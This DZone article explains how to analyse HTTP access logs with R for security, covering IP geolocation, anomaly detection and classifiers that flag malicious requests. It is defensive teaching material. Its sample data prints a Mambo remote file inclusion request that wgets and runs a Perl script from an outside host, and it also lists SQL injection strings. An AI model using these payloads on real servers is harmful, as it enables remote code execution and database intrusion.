Over a million developers have joined DZone.
{{announcement.body}}
{{announcement.title}}

Security Analytics, Bottom Up

DZone's Guide to

Security Analytics, Bottom Up

We take a look at some really interesting ways to use data analytics, AI, and Big Data techniques to increase your web security.

· Security Zone
Free Resource

Discover an in-depth knowledge about the different kinds of iOS hacking tools and techniques with the free iOS Hacking Guide from Security Innovation.

This article is intended for information security practitioners, developers and architects across application, infrastructure, and data protection paradigms. I am a security architect by profession and, more importantly, someone that's tried hard over the last few years, in particular, to bridge what I've learned about Data Analytics over the years (from things like Coursera courses and Data camps) with the information security world. The Refcardz I've come to use on DZone were one particular reason for writing this post, as I've tried to summarize a few matrices that could be of relevance to this "bridge."

One of the better ways to do this, as I believe, is to begin with the simple sources of truth - logs, in this case. Reactive as it may be, it gives us an important insight into what's statistically feasible with our data set and the more we understand our own data, the more proactive we can be. To get to the topic faster, I will try and illustrate the thought process through a simple matrix.

Security domain Log source  Candidates for univariate analysis Bi-variate analysis Outlier detection/ prediction
Access management  HTTP access logs 1. IP address, a categorical variable 
2. Review of the traffic for a given period
3. HTTP response codes, as a categorical variable 
1. Finding anomalies by looking at bytes consumed or the duration of the response for a request.
2. A classification analysis between two or more categorical variables - such as between IP address and request strings, response times, etc.
1. Predicting malicious traffic, based on patterns as observed within requests.
2. Identifying rogue IPs, based on the frequency of requests against time ranges.

A similar representation can be naturally created for infrastructure logs, be it from firewalls, IDS/IPS, etc. The intent here is to understand 'analytics' and statistical significance from the ground up before we leverage "top-down" tools in the marketplace. More often than not, the commercial tools (such as the SIEM alternatives or the security analytics tools) abstract way too much for us to comprehend what really happens from the bottom-up. 

If we are to replay the above matrix from a slightly different dimension, calling out statistical algorithms and their relevance to such an analysis, we'd get something like what I've given below. 

Univariate Analysis - Dissecting the IP Address 

access <- read_log("./access.log") 
colnames(access)=c('host','identity','userName','date','request','status','bytes','URL','agent','duration')

## to start with, get a matrix by the IP address of the request against a frequency 
byIP <- table(access$host)
byIP <- as.data.frame(byIP)

## not the most aesthetic but a basic plot goes here 
barplot(names=byIP$Var1, height=byIP$Freq, col="skyblue")

## given that wasn't good enough, we go about finding the geo location and therefore the world map comes IN 
## remember - for the rest of the code to work you need to have downloaded the maxmind mmdb file onto your system into the respective directory
file <- system.file("extdata","GeoLite2-City.mmdb", package = "rgeolocate")
set2 <- brewer.pal(8,"Set2")
world <- map_data('world')
world <- subset(world, region != "Antarctica")
results <- maxmind(byIP$Var1, file, c("continent_name", "country_code", "country_name", "city_name","latitude","longitude"))
g1 <- ggplot()
g1 <- g1 + geom_polygon(data=world, aes(long, lat, group=group), fill="white")
g1<- g1 + geom_point(data=results, aes(x=longitude, y=latitude), color=set2[2], size=1, alpha=0.1)
g1 <- g1 + labs(x="", y="")
g1 <- g1 + theme(panel.background=element_rect(fill=alpha(set2[3],0.2), 
                                               colour='white'))
g1

## you can take it further by checking if your IP-s had a bad reputation 
## just as before - the code below assumes you have the reputation feeds downloaded from the likes of Alienvault 
reputation <- "./reputation.data"
reputation.df <- read.csv(reputation, sep="#", header=FALSE)
colnames(reputation.df) <- c("IP", "Reliability", "Risk", "Type", "Country", "Locale", "Coords", "x")

table(reputation.df[reputation.df$IP %in% dest.ips, ]$Reliability)
badips <- as.character(reputation.df[(reputation.df$IP %in% dest.ips) & (reputation.df$Reliability > 3), ]$IP)
badips

That was a pretty simple start. If we now move into the bi-variate analysis, the statistical significance grows a little further. As before, we will leverage some libraries from the wide world out there - this time using the Anomaly detection package. 

library("devtools")
devtools::install_github("twitter/AnomalyDetection")
library(Rcpp)
library(AnomalyDetection)
library(ggplot2)
library(sqldf)
## have your access logs loaded up - as shown in the earlier code block 
df1 <- subset(access, select = c("date", "bytes"))
df2 <- subset(access, select = c("date", "duration"))
## to identify anomalies from a duration of transaction perspective 
alB <- AnomalyDetectionVec(df1[[2]], period=7, longterm_period=30, plot=T)
alB
## to identify anomalies from a volume of bytes perspective 
alD <- AnomalyDetectionVec(df2[[2]], period=7, longterm_period=30, plot=T)
## to get at the list of requests as shown by the graph as anomalies ... 
df1[alB$anoms$index, ]
## likewise - for the second dataframe - 
df2[alD$anoms$index, ]

And finally, let's get into something that's a little more demanding of these statistical algorithms. Let's see if we'd be able to predict an outcome from the data and if the algorithm could've learned any particular security patterns from all the data we've got. We will go back to the matrix here for some clarity before we look at some sample code. Remember, the premise for the matrix below is the use case where we try and pick out malicious requests from an HTTP access log that could be ridden with the typical vulnerabilities around SQL injection, XSS, etc. The variables involved here naturally include the request string itself, which could be malicious, and are also determined by one or more of the following: 

  • The host - a bad IP that's churning large and incoherent volumes of requests.

  • Date and time - not necessarily in sync with the operations performed on the request. 

  • Response bytes - potentially not in line with the traditional output for a given Request.

  • Duration, agent, etc. could also sometimes show anomalies, not just by themselves but in conjunction with one or more of the parameters above.

To start with, we introduce 2 variables to a typical log - one to Qualify the log line as "training" or "test" and the other to pronounce it as "malicious" or not.  

qualifier host date request status bytes URL agent duration malicious
train 193.91.75.11 [18/Aug/2006:13:23:13] GET /index.php_REQUEST[option]=... 200 167 http://www.buttercupgames.com/... Mozilla/5.0 746

Y

Once we've got that data point furnished to the more obvious logs we have already with us, we could then hope to test some of the obvious algorithms for identifying what's potentially malicious and what's not. 

Note - it wasn't easy crafting malicious requests and ones that could be coherent with the rest of the dataset itself. I had to synthetically append such requests from examples from the below links to get some relevant sample data here. 

https://www.sans.org/reading-room/whitepapers/securecode/sql-injection-modes-attack-defence-matters-23 

https://www.sans.org/reading-room/whitepapers/detection/identify-malicious-http-requests-34067 

Some specific attack patterns from - http://ossec-docs.readthedocs.io/en/latest/log_samples/apache/apache_attacks.html

That eventually meant that I had a few malicious records on my log file looking like the following (just the Request strings are pasted here): 

GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.buttercupgames.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.buttercupgames.com/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0
GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.buttercupgames.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.buttercupgames.com/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0

GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.buttercupgames.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.buttercupgames.com/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0

You could do a simple decode function to see that the request tries to do malicious things like traversing a path and is from the mambo attack samples above. We could create patterns out of known SQL injection attack signatures called out in the SANS link above such as: 

1 OR 1=1’

OR 1=1 --”

OR 1=1 --’OR 1=1;1 ... 

Note - remember, this isn't obviously the only way to run a prediction challenge. This is an attempt to understand what goes into the more common algorithms that support statistical analysis for use cases such as prediction. A few important lessons learned in this process include:

1. The world is full of categorical variables.

2. Statistical analysis on categorical variables requires far more comprehension of the 'subject' and the data than otherwise.

To elaborate a little more on the above points let me try another matrix here. There are 2 key assumptions I make in calling out the below points - one being that the analysis for a malicious request here stays pivoted on the request itself (with the updated request strings as above) and two, more importantly, the reader is expected to understand the concept of training and test datasets. 

Algorithm/ approach Typical challenges, workarounds
Logistic regression  The test data set cannot have variables that are not there in the training dataset. This would naturally mean that a request that's totally new in structure or construct may not be comprehended by a logistic regression if you ended up with a bunch of categorical variables like the request string itself. 
Naive Bayes  One of the more suitable alternatives; that can take in a variety of categorical variables, converted into 'factors' (by default in languages like R) and requires the output to be categorical, which is fine with us, as well.      
Neural network  Small challenge, as with regression above, the neural net library requires numeric variables; the outcome we're looking at may be a binary output here, as called out in the DZone Refcardz by Ricky Ho, it works on an iterative feedback mechanism where the error of output is used to adjust the corresponding weights of input. 
K nearest The Euclidean distance function seems to look for numeric input variables and unless we're able to derive quantitative data out of our categorical variables (meaningfully) this doesn't look like an automatic fit. 
Decision tree There are many different algorithm choices here and the best part here is that it can take a variety of inputs - numeric, binary, or categorical. We will, therefore, hope to have some success here. 

That said, let us close out this post with a few code snippets for algorithms that were considerably friendlier for Categorical variables as we have them. 

With Naive Bayes, we naturally find the prediction improving with the increase in the number of variables correlated with it. While we don't get into specifics on the choice of variables, a representative snippet goes like this: 

library(e1071)
model <- naiveBayes(malicious~., data=train)
pred <- predict(model, test[,-10])

Now you could pivot the "malicious" column against just the "request" and/ or the "host," etc. This is just a sample to show that the success rate naturally depends on the quality of the data itself and the extent to which it is representative of the problem on the test data set. The false positive representation goes like this for the above snippet:

> table(pred, test$malicious)    
pred  N  Y
   N 37  0
   Y  6  4

Of course, that's a small data set where 6 out of 47 records were erroneous in the prediction. 

With Decision trees, the snippet goes like this: 

library(rpart)
treemodel <- rpart(malicious~request+host, data=train, control=rpart.control(minsplit=2, minbucket=1, cp=0.001))
text(treemodel, use.n=T)
predTree <- predict(treemodel, newdata=test, type='class')
table(predTree, test$malicious)

And our false positive rate improves for the same data set, though only slightly. 

> table(predTree, test$malicious)        
predTree  N  Y
       N 43  2
       Y  0  2

Summary

While the subject knowledge behind the data for analytics can never be overemphasized, this article tries to throw a little more light into the world of statistics, bottom-up as titled, in terms of understanding the algorithm choices for a typical real-world dataset (an HTTP log for example) besides the kind of analysis that can be performed on one (univariate, bi-variate, etc.). I hope this helps you get a jump start into the world of Analytics with a little more insight into how it can be relevant for your data. 

Learn about the importance of a strong culture of cybersecurity, and examine key activities for building – or improving – that culture within your organization.

Topics:
log analytics ,information security ,application security ,data security ,security

Opinions expressed by DZone contributors are their own.

{{ parent.title || parent.header.title}}

{{ parent.tldr }}

{{ parent.urlSource.name }}